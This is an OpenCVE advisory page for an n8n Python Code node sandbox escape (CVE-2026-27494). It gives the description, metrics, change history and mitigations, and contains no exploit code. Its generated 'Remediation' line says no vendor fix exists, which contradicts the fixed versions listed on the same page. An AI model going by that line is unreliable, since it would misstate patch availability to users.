Description
n8n is an open source workflow automation platform. Prior to versions 2.10.1, 2.9.3, and 1.123.22, an authenticated user with permission to create or modify workflows could use the Python Code node to escape the sandbox. The sandbox did not sufficiently restrict access to certain built-in Python objects, allowing an attacker to exfiltrate file contents or achieve RCE. On instances using internal Task Runners (default runner mode), this could result in full compromise of the n8n host. On instances using external Task Runners, the attacker might gain access to or impact other task executed on the Task Runner. Task Runners must be enabled using `N8N_RUNNERS_ENABLED=true`. The issue has been fixed in n8n versions 2.10.1, 2.9.3, and 1.123.22. Users should upgrade to this version or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations. Limit workflow creation and editing permissions to fully trusted users only., and/or disable the Code node by adding `n8n-nodes-base.code` to the `NODES_EXCLUDE` environment variable. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Published: 2026-02-25
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: Remote Code Execution / Arbitrary File Read via Python Code node sandbox escape
Action: Patch Now
AI Analysis

Impact

An authentication‑required user with permission to create or modify a workflow can execute code within the Python Code node that bypasses the sandbox restriction. The vulnerability permits reading arbitrary files on the host or, in the worst case, executing arbitrary code. The flaw is tied to CWE‑497 and is able to exfiltrate sensitive data or compromise the entire system when the internal Task Runner is in use.

Affected Systems

The affected product is n8n‑io’s n8n workflow platform. Versions prior to 2.10.1, 2.9.3, and 1.123.22 are vulnerable. The fix is available in those three release versions and later.

Risk and Exploitability

The vulnerability carries a CVSS score of 7.1 and an EPSS score of less than 1 %, indicating a low but non‑zero likelihood of exploitation. It is not listed in the CISA KEV catalog. The attack vector is authenticated workflow creation/editing; the attacker can read sensitive files or achieve full host compromise when internal Task Runners are enabled. With external task runners, the adversary may affect other tasks on the runner. The risk is moderate with potential high impact if the sandbox escape leads to RCE.

Generated by OpenCVE AI on April 17, 2026 at 14:46 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to n8n v2.10.1, v2.9.3, or v1.123.22 or later to apply the official fix
  • Restrict workflow creation and editing to trusted users only to deny the exploit vector
  • Disable the Python Code node by adding `n8n-nodes-base.code` to the `NODES_EXCLUDE` environment variable as a temporary workaround

Generated by OpenCVE AI on April 17, 2026 at 14:46 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-mmgg-m5j7-f83h n8n has Arbitrary File Read via Python Code Node Sandbox Escape
History

Thu, 05 Mar 2026 16:30:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*
Metrics cvssV3_1

{'score': 9.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}

Fri, 27 Feb 2026 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 26 Feb 2026 13:30:00 +0000

Type Values Removed Values Added
First Time appeared N8n
N8n n8n
Vendors & Products N8n
N8n n8n

Wed, 25 Feb 2026 22:30:00 +0000

Type Values Removed Values Added
Description n8n is an open source workflow automation platform. Prior to versions 2.10.1, 2.9.3, and 1.123.22, an authenticated user with permission to create or modify workflows could use the Python Code node to escape the sandbox. The sandbox did not sufficiently restrict access to certain built-in Python objects, allowing an attacker to exfiltrate file contents or achieve RCE. On instances using internal Task Runners (default runner mode), this could result in full compromise of the n8n host. On instances using external Task Runners, the attacker might gain access to or impact other task executed on the Task Runner. Task Runners must be enabled using `N8N_RUNNERS_ENABLED=true`. The issue has been fixed in n8n versions 2.10.1, 2.9.3, and 1.123.22. Users should upgrade to this version or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations. Limit workflow creation and editing permissions to fully trusted users only., and/or disable the Code node by adding `n8n-nodes-base.code` to the `NODES_EXCLUDE` environment variable. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Title n8n has Arbitrary File Read via Python Code Node Sandbox Escape
Weaknesses CWE-497
References
Metrics cvssV4_0

{'score': 7.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

N8n N8n
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T20:28:57.625Z

Reserved: 2026-02-19T19:46:03.542Z

Link: CVE-2026-27494

cve-icon Vulnrichment

Updated: 2026-02-26T20:28:52.988Z

cve-icon NVD

Status : Analyzed

Published: 2026-02-25T23:16:20.677

Modified: 2026-03-05T16:22:42.753

Link: CVE-2026-27494

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-17T15:00:11Z

Weaknesses